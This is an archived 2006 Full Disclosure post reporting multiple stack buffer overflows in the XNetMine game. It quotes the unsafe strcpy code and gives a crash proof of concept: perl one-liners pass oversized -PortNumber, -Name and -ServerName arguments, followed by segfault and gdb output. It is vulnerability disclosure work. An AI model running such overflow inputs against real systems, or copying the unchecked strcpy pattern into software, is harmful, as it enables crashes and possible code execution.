Full Disclosure mailing list archives
XNetMine (no version) multiple buffer overflow.
From: Federico Fazzi <federico () autistici org>
Date: Wed, 18 Oct 2006 13:18:51 +0200
// Vendor: Martin Bauer Software: http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz *Vulnerable code:* -- line: 672/676 if (strncmp("-PortNumber",argv[t+1],11)==0) { char text[500]; strcpy(text,argv[t+1]); strcpy(Port,&text[11]); } -- line: 677/682 if (strncmp("-Name",argv[t+1],5)==0) { char text[500]; strcpy(text,argv[t+1]); strcpy(User,&text[5]); } -- line: 683/688 if (strncmp("-ServerName",argv[t+1],11)==0) { char text[500]; strcpy(text,argv[t+1]); strcpy(ServerName,&text[11]); } -- *Proof of concept:* -- federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'`Server:1094795585 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAAAAA(...) ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'` Server:1 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAA Name:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" ServerName:"" Segmentation fault federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'` Server:1 Client:0 PortNum:31337 Name:"31337" ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" Segmentation fault -- *Debug information:* -- (gdb) p $eip$1 = (void (*)()) 0x804a862 (gdb) stepi
Program terminated with signal SIGSEGV, Segmentation fault. The program no longer exists. SIGSEGV 0x0804a862 in main () -- federico federico () plugs it / http://defsol.plugs.it/ //
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- XNetMine (no version) multiple buffer overflow. Federico Fazzi (Oct 18)